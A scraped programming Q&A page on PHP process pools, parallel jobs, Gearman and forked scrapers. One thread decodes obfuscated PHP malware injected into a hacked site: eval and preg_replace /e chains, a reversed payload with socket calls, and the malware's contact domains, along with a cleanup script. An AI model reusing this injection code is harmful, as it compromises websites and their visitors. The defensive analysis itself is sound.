linux worker script/queue (php) - php

I need a binary/script (php) that does the following.
Start n process of X in the background and maintain the number processes.
An example:
n = 50
initially 50 processes are started
a process exits
49 are still running
so 1 should be started again.
P.S.: I posted the same question on SV, which makes me probably very unpopular.

Can you use the crontab linux and write to a db or file the number of current process?.
If DB, the advantage is that you can use to procedure and lock the table, and write the number of process.
But to backgroun you should use & at the end of the call to script
# php-f pro.php &

Pseudocode:
for (i=1; i<=50; i++)
myprocess
endfor
while true
while ( $(ps --no-headers -C myprocess|wc -l) < 50 )
myprocess
endwhile
endwhile
If you translate this to php and fix its flaws, it might just do what you want.

I would go in the direction that andres suggested. Just put something like this at the top of your pro.php file...
$this_file = __FILE__;
$final_count = 50;
$processes = `ps auwx | grep "php -f $this_file"`;
$processes = explode("\n", $processes);
if (count($processes)>$final_count+3) {
exit;
}
//... Remaining code goes here

Have you tried making a PHP Daemon before?
http://kevin.vanzonneveld.net/techblog/article/create_daemons_in_php/

Here's something in Perl I have in my library (and hey, let's be honest, I'm not going to rig this up in PHP just to give you something working in that language this moment. I'm just using what I can copy / paste).
#!/usr/bin/perl
use threads;
use Thread::Queue;
my #workers;
my $num_threads = shift;
my $dbname = shift;
my $queue = new Thread::Queue;
for (0..$num_threads-1) {
$workers[$_] = new threads(\&worker);
print "TEST!\n";
}
while ($_ = shift #ARGV) {
$queue->enqueue($_);
}
sub worker() {
while ($file = $queue->dequeue) {
system ('./4parser.pl', $dbname, $file);
}
}
for (0..$num_threads-1) { $queue->enqueue(undef); }
for (0..$num_threads-1) { $workers[$_]->join; }
Whenever one of those systems calls finishes up, it moves on dequeing. Oh, and damn if I know hwy I did 0..$numthreads instead of the normal my $i = 0; $i < ... idiom, but I did it that way that time.

I have to solutions to propose. Both do child process reboot on exit, do child process reloading on USR1 signal, wait for the children exit on SIGTERM and so on.
The first is based on swoole php extension. It is very performant, async, non-blocking. Here's the usage example code:
<?php
use Symfony\Component\Process\PhpExecutableFinder;
require_once __DIR__.'/../vendor/autoload.php';
$phpBin = (new PhpExecutableFinder)->find();
if (false === $phpBin) {
throw new \LogicException('Php executable could not be found');
}
$daemon = new \App\Infra\Swoole\Daemon();
$daemon->addWorker(1, $phpBin, [__DIR__ . '/console', 'quartz:scheduler', '-vvv']);
$daemon->addWorker(3, $phpBin, [__DIR__ . '/console', 'enqueue:consume', '--setup-broker', '-vvv']);
$daemon->run();
The daemon code is here
Another is based on Symfony process library. It does not require any extra extensions. The usage example and daemon code could be found here

Related

nohup process keep shutting down

I am trying to run 10.000 processes to create asterisks phone accounts.
This is to stress-test our Asterisk server.
I called with php an exec() function to create a Linux command.
nohup /usr/src/pjproject-2.3/pjsip-apps/bin/pjsua-x86_64-unknown-linux-gnu --id=sip:%s#13.113.163.3 --registrar=sip:127.0.0.1:25060 --realm=* --username=%s --password=123456 --local-port=%s --null-audio --no-vad --max-calls=32 --no-tcp >>/dev/null 2>>/dev/null & $(echo -ne \'\r\')"
Everything works perfect and the script does exactly what I am expecting.
But here comes also the next problem; after creating the 10.000 accounts, the processes are suddenly all getting killed.
Why is this?
Isn't it so that the nohup function keeps the processes alive?
After calling the nohup function I am also calling the disown function.
Thank you for the help
[edit]
I also tried this project with the function screen, the screen functions work like a charm, but the problem is the cpu usage. To create 10.000 screens, makes a linux server go nuts, this is why I choose for nohup.
The full php code:
<?php
# count
$count_screens = 0;
# port count start
$port_count = 30000;
# register accounts number
$ext_number = 1000;
# amount of times you want this loop to go
$min_accounts = 0;
$max_accounts = 1000;
Class shell {
const CREATE_SESSION = 'screen -dmS stress[%s]';
const RUN_PJSUA = 'screen -S stress[%s] -p 0 -rX stuff "nohup /usr/src/pjproject-2.3/pjsip-apps/bin/pjsua-x86_64-unknown-linux-gnu --id=sip:%s#13.113.163.3 --registrar=sip:127.0.0.1:25060 --realm=* --username=%s --password=123456 --local-port=%s --null-audio --no-vad --max-calls=32 --no-tcp >>/dev/null 2>>/dev/null &"';
const DISOWN_PJSUA = 'screen -S stress[%s] -p 0 -rX stuff "disown -l $(echo -ne \'\r\')"';
public function openShell($count_screens) {
# creating a new screen to make the second call
$command = sprintf(static:: CREATE_SESSION, $count_screens);
$string = exec($command);
return var_dump($string);
}
public function runPJSUA($count_screens, $ext_number, $ext_number, $port_count) {
# register a new pjsua client
$command = sprintf(static:: RUN_PJSUA, $count_screens, $ext_number, $ext_number, $port_count);
$string = exec($command);
usleep(20000);
return var_dump($string);
}
public function disownPJSUA($count_screens) {
# register a new pjsua client
$command = sprintf(static:: DISOWN_PJSUA, $count_screens);
$string = exec($command);
return var_dump($string);
}
}
while ($min_accounts < $max_accounts) {
$shell = new shell();
if ($count_screens == '0') {
$count_screens++;
echo $shell->openShell($count_screens);
} else {
$count_screens = 1;
}
$port_count++;
$ext_number++;
$min_accounts++;
echo $shell->runPJSUA($count_screens, $ext_number, $ext_number, $port_count);
echo $shell->disownPJSUA($count_screens);
}
?>
Pjsua is relatively heavy application, definitely too heavy to run 10000 instances, not intended for this kind of testing. As you are configuring it for 32 calls even running out of ports would be a problem (there are two ports per call reserved plus port for SIP). If you want to stay with pjsua you might at least optimize test by configuring multiple accounts for single pjsua instance. It might be limited by command line length, but ~30 accounts per instance might work.

Execute every N command in parallel in shell_exec() in PHP

I'd like to execute N commands in bash in parallel. And then the next N commands after all the commands finish, and then the next N commands …
Because I am not an expert in shell scripting, I have resorted to PHP. But I suspect my code is not doing what I needed optimally:
<?php
// d() is a function like var_dump()
d($d);
$ips = array(
"83.149.70.159:13012" => 8,
"37.48.118.90:13082" => 77,
"83.149.70.159:13082" => 77,);
d($ips);
reset($ips);
$prx = "storm";
$f = array();
foreach ($d as $calln) {
$ip = current($ips);
$ipkey = key($ips);
d($ip, $ipkey);
$comd = choose_comd($prx);
d( $comd);
$f[] = shell_exec($comd);
d($f);
choose_limiting ($prx);
d($GLOBALS['a']);
}
function choose_comd ($prx) {
d($GLOBALS['calln']);
switch ($prx) {
case "storm":
return "cd /Users/jMac-NEW/HoldingForDO/phub/phubalt_pages && curl -x {$GLOBALS['ipkey']} \"https://catalog.loc.gov/vwebv/search?searchArg={$GLOBALS['calln']}&searchCode=CALL%2B&searchType=1&limitTo=none&fromYear=&toYear=&limitTo=LOCA%3Dall&limitTo=PLAC%3Dall&limitTo=TYPE%3Dall&limitTo=LANG%3Dall&recCount=1200\" >trial_{$GLOBALS['calln']}_out.html 2> trial_{$GLOBALS['calln']}_error.txt &";;
// more cases ...
}
function choose_limiting ($prx){
switch ($prx) {
case "":
if (!next($ips)) {
sleep (80);
reset($ips);
}
case "storm":
if (!isset($GLOBALS['a'])) {
echo "if";
$GLOBALS['a'] = 0;
}
elseif ($GLOBALS['a'] == current($GLOBALS['ips'])) {
echo "elseif";
next($GLOBALS['ips']);
sleep(80/count($GLOBALS['ips']) - 7); // 80 is the standard
$GLOBALS['a'] = 0;
}
else {
echo "else";
$GLOBALS['a']++;
}
}
}
function trying () {
$GLOBALS['a']++;
d($GLOBALS['a']);
}
Firstly, I am not sure if running a loop around shell_exec("command… &") will make all the commands run in parallel.
Secondly, the loop runs around all the possible commands, but is made to sleep() with an arbitrary / estimated duration of 70 after every N commands are run with shell_exec(). 70 seconds sleep period may or may not correspond with the completion of all previous N commands that have been executed, but i am just assuming that it will be around there.
May I know if what I have done has fulfilled my aim? If no, why? And what other solution is there?
Actually I do not mind just using bash directly, but the problem is that every iteration of loop is supposed to be fed with a variable $calln from a php array $d populated in earlier parts of the script not shown. If PHP can do what I need, pls stick to PHP.

Hacked site - encrypted code

Couple days ago I gave noticed that almost all php files on my server are infected with some encrypted code and in almost every file is different. Here is the example from one of the files:
http://pastebin.com/JtkNya5m
Can anybody tell me what this code do or how to decode it?
You can calculate the values of some of the variables, and begin to get your bearings.
$vmksmhmfuh = 'preg_replace'; //substr($qbrqftrrvx, (44195 - 34082), (45 - 33));
preg_replace('/(.*)/e', $viwdamxcpm, null); // Calls the function wgcdoznijh() $vmksmhmfuh($ywsictklpo, $viwdamxcpm, NULL);
So the initial purpose is to call the wgcdonznijh() function with the payloads in the script, this is done by way of an embedded function call in the pre_replace subject the /e in the expression.
/* aviewwjaxj */ eval(str_replace(chr((257-220)), chr((483-391)), wgcdoznijh($tbjmmtszkv,$qbrqftrrvx))); /* ptnsmypopp */
If you hex decode the result of that you will be just about here:
if ((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) {
$GLOBALS["anuna"] = 1;
function fjfgg($n)
{
return chr(ord($n) - 1);
}
#error_reporting(0);
preg_replace("/(.*)/e", "eval(implode(array_map("fjfgg",str_split("\x25u:f!>!(\x25\x78:!> ...
The above is truncated, but you have another payload as the subject of the new preg_replace function. Again due to e it has the potential to execute.
and it is using the callback on array_map to further decode the payload which passed to the eval.
The pay load for eval looks like this (hex decoded):
$t9e = '$w9 ="/(.*)/e";$v9 = #5656}5;Bv5;oc$v5Y5;-4_g#&oc$5;oc$v5Y5;-3_g#&oc$5;oc$v5Y5;-2_g#&oc$5;oc$v5Y5;-1_g#&oc$5;B&oc$5{5-6dtz55}56;%v5;)%6,"n\r\n\r\"(edolpxe&)%6,m$(tsil5;~v5)BV%(6fi5;)J(esolcW#5}5;t$6=.6%5{6))000016,J(daerW&t$(6elihw5;B&%5;)qer$6,J(etirwW5;"n\n\X$6:tsoH"6=.6qer$5;"n\0.1/PTTH6iru$6TEG"&qer$5}5;~v5;)J(esolcW#5{6))086,1pi$6,J(tcennocW#!(6fi5;)PCT_LOS6,MAERTS_KCOS6,TENI_FA(etaercW#&J5;~v5)2pi$6=!61pi$(6fi5;))1pi$(gnol2pi#(pi2gnol#&2pi$5;)X$(emanybXteg#&1pi$5;]"yreuq"[p$6.6"?"6.6]"htap"[p$&iru$5;B=]"yreuq"[p$6))]"yreuq"[p$(tessi!(fi5;]"X"[p$&X$5;-lru_esrap#6=p$5;~v5)~^)"etaercWj4_z55}5;%v5;~v5)BV%(6fi5;)cni$6,B(edolpmi#&%5;-elif#&cni$5;~v5)~^)"elifj3_z5}5;ser$v5;~v5)BVser$(6fi5;)hc$(esolcQ5;)hc$(cexeQ&ser$5;)06,REDAEH+5;)016,TUOEMIT+5;)16,REFSNARTNRUTER+5;)lru$6,LRU+5;)(tiniQ&hc$5;~v5)~^)"tiniQj2_z555}5;%v5;~v5)BV%(6fi5;-Z#&%5;~v5)~^)"Zj1_z59 |6: |5:""|B: == |V:tsoh|X:stnetnoc_teg_elif|Z:kcos$|J:_tekcos|W:_lruc|Q:)lru$(|-:_TPOLRUC ,hc$(tpotes_lruc|+:tpotes_lruc|*: = |&: === |^:fub$|%:eslaf|~: nruter|v:)~ ==! oc$( fi|Y:g noitcnuf|z:"(stsixe_noitcnuf( fi { )lru$(|j}}};eslaf nruter {esle };))8-,i$,ataDzg$(rtsbus(etalfnizg# nruter };2+i$=i$ )2 & glf$ ( fi ;1+)i$ ,"0\",ataDzg$(soprts=i$ )61 & glf$( fi ;1+)i$,"0\",ataDzg$(soprts=i$ )8 & glf$( fi };nelx$+2+i$=i$ ;))2,i$,ataDzg$(rtsbus,"v"(kcapnu=)nelx$(tsil { )4 & glf$( fi { )0>glf$( fi ;))1,3,ataDzg$(rtsbus(dro=glf$ ;01=i$ { )"80x\b8x\f1x\"==)3,0,ataDzg$(rtsbus( fi { )ataDzg$(izgmoc noitcnuf { ))"izgmoc"(stsixe_noitcnuf!( fi|0} ;1o$~ } ;"" = 1o$Y;]1[1a$ = 1o$ )2=>)1a$(foezis( fi ;)1ac$,"0FN!"(edolpxe#=1a$ ;)po$,)-$(dtg#(2ne=1ac$ ;4g$."/".)"moc."(qqc."//:ptth"=-$ ;)))e&+)d&+)c&+)b&+)a&(edocne-(edocne-."?".po$=4g$ ;)999999,000001(dnar_tm=po$ {Y} ;"" = 1o$ { ) )))a$(rewolotrts ,"i/" . ))"relbmar*xednay*revihcra_ai*tobnsm*pruls*elgoog"(yarra ,"|"(edolpmi . "/"(hctam_gerp( ro )"nimda",)e$(rewolotrts(soprrtsQd$(Qc$(Qa$(( fi ;)"bc1afd45*88275b5e*8e4c7059*8359bd33"(yarra = rramod^FLES_PHP%e^TSOH_PTTH%d^RDDA_ETOMER%c^REREFER_PTTH%b^TNEGA_RESU_PTTH%a$ { )(212yadj } ;a$~ ;W=a$Y;"non"=a$ )""==W( fiY;"non"=a$ ))W(tessi!(fi { )marap$(212kcehcj } ;))po$ ,txet$(2ne(edocne_46esab~ { )txet&j9 esle |Y:]marap$[REVRES_$|W: ro )"non"==|Q:lru|-:.".".|+:","|*:$,po$(43k|&:$ ;)"|^:"(212kcehc=|%: nruter|~: noitcnuf|j}}8zc$9nruter9}817==!9eslaf28)45#9=979{96"5"(stsixe_328164sserpmocnuzg08164izgmoc08164etalfnizg09{9)llun9=9htgnel$9,4oocd939{9))"oocd"(stsixe_3!2| * ;*zd$*) )*edocedzg*zc$(*noitcnuf*( fi*zd$ nruter ) *# = zd$( ==! eslaf( fi;)"j"(trats_boU~~~~;t$U&zesleU~;)W%Y%RzesleU~;)W#Y#RU;)v$(oocd=t$U;"54+36Q14+c6Q06+56Q26+".p$=T;"05+36Q46+16Q55+".p$=1p$;"f5Q74+56Q26+07Q"=p$U;)"enonU:gnidocnE-tnetnoC"(redaeHz)v$(jUwz))"j"(stsixe_w!k9 |U:2p$|T:x\|Q:1\|+:nruter|&:lmth|%:ydob|#:} |~: { |z:(fi|k:22ap|j:noitcnuf|w:/\<\(/"(T &z))t$,"is/|Y:/\<\/"(1p$k|R:1,t$ ,"1"."$"."n\".)(212yad ,"is/)>\*]>\^[|W#; $syv= "eval(str_replace(array"; $siv = "str_replace";$slv = "strrev";$s1v="create_function"; $svv = #//}9;g$^s$9nruter9}9;)8,0,q$(r$=.g$9;))"46x.x?x\16\17x\".q$.g$(m$,"*H"(p$9=9q$9{9))s$(l$<)g$(l$(9elihw9;""9=9g$9;"53x$1\d6x\"=m$;"261'x1x.1x\"=r$;"351xa\07x\"=p$;"651.x%1x&1x\"=l$9{9)q$9,s$(2ne9noitcnuf;}#; $n9 = #1067|416|779|223|361#; $ll = "preg_replace"; $ee1 = array(#\14#,#, $#,#) { #,#[$i]#,#substr($#,#a = $xx("|","#,#,strpos($y,"9")#,# = str_replace($#,#x3#,#\x7#,#\15#,#;$i++) {#,#function #,#x6#,#); #,#for($i=0;$i
Which looks truncated ...
That is far as I have time for, but if you wanted to continue you may find the following url useful.
http://ddecode.com/
Good luck
I found the same code in a Wordpress instance and wrote a short script to remove it of all files:
$directory = new RecursiveDirectoryIterator(dirname(__FILE__));
$iterator = new RecursiveIteratorIterator($directory);
foreach ($iterator as $filename => $cur)
{
$contents = file_get_contents($filename);
if (strpos($contents, 'tngmufxact') !== false && strlen($contents) > 13200 && strpos($contents, '?>', 13200) == 13278) {
echo $filename.PHP_EOL;
file_put_contents($filename, substr($contents, 13280));
}
}
Just change the string 'tngmufxact' to your obfuscated version and everything will be removed automatically.
Maybe the length of the obfuscated string will differ - don't test this in your live environment!
Be sure to backup your files before executing this!
I've decoded this script and it is (except the obfuscation) exactly the same as this one: Magento Website Hacked - encryption code in all php files
The URL's inside are the same too:
33db9538.com
9507c4e8.com
e5b57288.com
54dfa1cb.com
If you are unsure/inexperienced don't try to execute or decode the code yourself, but get professional help.
Besides that: the decoding was done manually by picking the code pieces and partially executing them (inside a virtual machine - just in case something bad happens).
So basically I've repeated this over and over:
echo the hex strings to get the plain text (to find out which functions get used)
always replace eval with echo
always replace preg_replace("/(.*)/e", ...) with echo(preg_replace("/(.*)/", ...))
The e at the end of the regular expression means evaluate (like the php function eval), so don't forget to remove that too.
In the end you have a few function definitions and one of them gets invoked via ob_start.

determining proper gearman task function to retrieve real-time job status

Very simply, I have a program that needs to perform a large process (anywhere from 5 seconds to several minutes) and I don't want to make my page wait for the process to finish to load.
I understand that I need to run this gearman job as a background process but I'm struggling to identify the proper solution to get real-time status updates as to when the worker actually finishes the process. I've used the following code snippet from the PHP examples:
do {
sleep(3);
$stat = $gmclient->jobStatus($job_handle);
if (!$stat[0]) // the job is known so it is not done
$done = true;
echo "Running: " . ($stat[1] ? "true" : "false") . ", numerator: " . $stat[2] . ", denomintor: " . $stat[3] . "\n";
} while(!$done);
echo "done!\n";
and this works, however it appears that it just returns data to the client when the worker finished telling the job what to do. Instead I want to know when the literal process of the job finished.
My real-life example:
Pull several data feeds from an API (some feeds take longer than others)
Load a couple of the ones that always load fast, place a "Waiting/Loading" animation on the section that was sent off to a worker queue
When the work is done and the results have been completely retrieved, replace the animation with the results
This is a bit late, but I stumbled across this question looking for the same answer. I was able to get a solution together, so maybe it will help someone else.
For starters, refer to the documentation on GearmanClient::jobStatus. This will be called from the client, and the function accepts a single argument: $job_handle. You retrieve this handle when you dispatch the request:
$client = new GearmanClient( );
$client->addServer( '127.0.0.1', 4730 );
$handle = $client->doBackground( 'serviceRequest', $data );
Later on, you can retrieve the status by calling the jobStatus function on the same $client object:
$status = $client->jobStatus( $handle );
This is only meaningful, though, if you actually change the status from within your worker with the sendStatus method:
$worker = new GearmanWorker( );
$worker->addFunction( 'serviceRequest', function( $job ) {
$max = 10;
// Set initial status - numerator / denominator
$job->sendStatus( 0, $max );
for( $i = 1; $i <= $max; $i++ ) {
sleep( 2 ); // Simulate a long running task
$job->sendStatus( $i, $max );
}
return GEARMAN_SUCCESS;
} );
while( $worker->work( ) ) {
$worker->wait( );
}
In versions of Gearman prior to 0.5, you would use the GearmanJob::status method to set the status of a job. Versions 0.6 to current (1.1) use the methods above.
See also this question: Problem With Gearman Job Status

Improving HTML scraper efficiency with pcntl_fork()

With the help from two previous questions, I now have a working HTML scraper that feeds product information into a database. What I am now trying to do is improve efficiently by wrapping my brain around with getting my scraper working with pcntl_fork.
If I split my php5-cli script into 10 separate chunks, I improve total runtime by a large factor so I know I am not i/o or cpu bound but just limited by the linear nature of my scraping functions.
Using code I've cobbled together from multiple sources, I have this working test:
<?php
libxml_use_internal_errors(true);
ini_set('max_execution_time', 0);
ini_set('max_input_time', 0);
set_time_limit(0);
$hrefArray = array("http://slashdot.org", "http://slashdot.org", "http://slashdot.org", "http://slashdot.org");
function doDomStuff($singleHref,$childPid) {
$html = new DOMDocument();
$html->loadHtmlFile($singleHref);
$xPath = new DOMXPath($html);
$domQuery = '//div[#id="slogan"]/h2';
$domReturn = $xPath->query($domQuery);
foreach($domReturn as $return) {
$slogan = $return->nodeValue;
echo "Child PID #" . $childPid . " says: " . $slogan . "\n";
}
}
$pids = array();
foreach ($hrefArray as $singleHref) {
$pid = pcntl_fork();
if ($pid == -1) {
die("Couldn't fork, error!");
} elseif ($pid > 0) {
// We are the parent
$pids[] = $pid;
} else {
// We are the child
$childPid = posix_getpid();
doDomStuff($singleHref,$childPid);
exit(0);
}
}
foreach ($pids as $pid) {
pcntl_waitpid($pid, $status);
}
// Clear the libxml buffer so it doesn't fill up
libxml_clear_errors();
Which raises the following questions:
1) Given my hrefArray contains 4 urls - if the array was to contain say 1,000 product urls this code would spawn 1,000 child processes? If so, what is the best way to limit the amount of processes to say 10, and again 1,000 urls as an example split the child work load to 100 products per child (10 x 100).
2) I've learn that pcntl_fork creates a copy of the process and all variables, classes, etc. What I would like to do is replace my hrefArray variable with a DOMDocument query that builds the list of products to scrape, and then feeds them off to child processes to do the processing - so spreading the load across 10 child workers.
My brain is telling I need to do something like the following (obviously this doesn't work, so don't run it):
<?php
libxml_use_internal_errors(true);
ini_set('max_execution_time', 0);
ini_set('max_input_time', 0);
set_time_limit(0);
$maxChildWorkers = 10;
$html = new DOMDocument();
$html->loadHtmlFile('http://xxxx');
$xPath = new DOMXPath($html);
$domQuery = '//div[#id=productDetail]/a';
$domReturn = $xPath->query($domQuery);
$hrefsArray[] = $domReturn->getAttribute('href');
function doDomStuff($singleHref) {
// Do stuff here with each product
}
// To figure out: Split href array into $maxChilderWorks # of workArray1, workArray2 ... workArray10.
$pids = array();
foreach ($workArray(1,2,3 ... 10) as $singleHref) {
$pid = pcntl_fork();
if ($pid == -1) {
die("Couldn't fork, error!");
} elseif ($pid > 0) {
// We are the parent
$pids[] = $pid;
} else {
// We are the child
$childPid = posix_getpid();
doDomStuff($singleHref);
exit(0);
}
}
foreach ($pids as $pid) {
pcntl_waitpid($pid, $status);
}
// Clear the libxml buffer so it doesn't fill up
libxml_clear_errors();
But what I can't figure out is how to build my hrefsArray[] in the master/parent process only and feed it off to the child process. Currently everything I've tried causes loops in the child processes. I.e. my hrefsArray gets built in the master, and in each subsequent child process.
I am sure I am going about this all totally wrong, so would greatly appreciate just general nudge in the right direction.
Introduction
pcntl_fork() is not the only way to improve performance HTML scraper while it might be a good idea to use Message Queue has Charles suggested but you still need a faster effective way to pull that request in your workers
Solution 1
Use curl_multi_init ... curl is actually faster and using multi curl gives you parallel processing
From PHP DOC
curl_multi_init Allows the processing of multiple cURL handles in parallel.
So Instead of using $html->loadHtmlFile('http://xxxx'); to load the files several times you can just use curl_multi_init to load multiple url at the same time
Here are some Interesting Implementations
php - Fastest way to check presence of text in many domains (above 1000)
php get all the images from url which width and height >=200 more quicker
How to prevent server from overloading during Curl requests in PHP
Solution 2
You can use pthreads to use multi-threading in PHP
Example
// Number of threads you want
$threads = 10;
// Treads storage
$ts = array();
// Your list of URLS // range just for demo
$urls = range(1, 50);
// Group Urls
$urlsGroup = array_chunk($urls, floor(count($urls) / $threads));
printf("%s:PROCESS #load\n", date("g:i:s"));
$name = range("A", "Z");
$i = 0;
foreach ( $urlsGroup as $group ) {
$ts[] = new AsyncScraper($group, $name[$i ++]);
}
printf("%s:PROCESS #join\n", date("g:i:s"));
// wait for all Threads to complete
foreach ( $ts as $t ) {
$t->join();
}
printf("%s:PROCESS #finish\n", date("g:i:s"));
Output
9:18:00:PROCESS #load
9:18:00:START #5592 A
9:18:00:START #9620 B
9:18:00:START #11684 C
9:18:00:START #11156 D
9:18:00:START #11216 E
9:18:00:START #11568 F
9:18:00:START #2920 G
9:18:00:START #10296 H
9:18:00:START #11696 I
9:18:00:PROCESS #join
9:18:00:START #6692 J
9:18:01:END #9620 B
9:18:01:END #11216 E
9:18:01:END #10296 H
9:18:02:END #2920 G
9:18:02:END #11696 I
9:18:04:END #5592 A
9:18:04:END #11568 F
9:18:04:END #6692 J
9:18:05:END #11684 C
9:18:05:END #11156 D
9:18:05:PROCESS #finish
Class Used
class AsyncScraper extends Thread {
public function __construct(array $urls, $name) {
$this->urls = $urls;
$this->name = $name;
$this->start();
}
public function run() {
printf("%s:START #%lu \t %s \n", date("g:i:s"), $this->getThreadId(), $this->name);
if ($this->urls) {
// Load with CURL
// Parse with DOM
// Do some work
sleep(mt_rand(1, 5));
}
printf("%s:END #%lu \t %s \n", date("g:i:s"), $this->getThreadId(), $this->name);
}
}
It seems like I suggest this daily, but have you looked at Gearman? There's even a well documented PECL class.
Gearman is a work queue system. You'd create workers that connect and listen for jobs, and clients that connect and send jobs. The client can either wait for the requested job to be completed, or it can fire it and forget. At your option, workers can even send back status updates, and how far through the process they are.
In other words, you get the benefits of multiple processes or threads, without having to worry about processes and threads. The clients and workers can even be on different machines.

Categories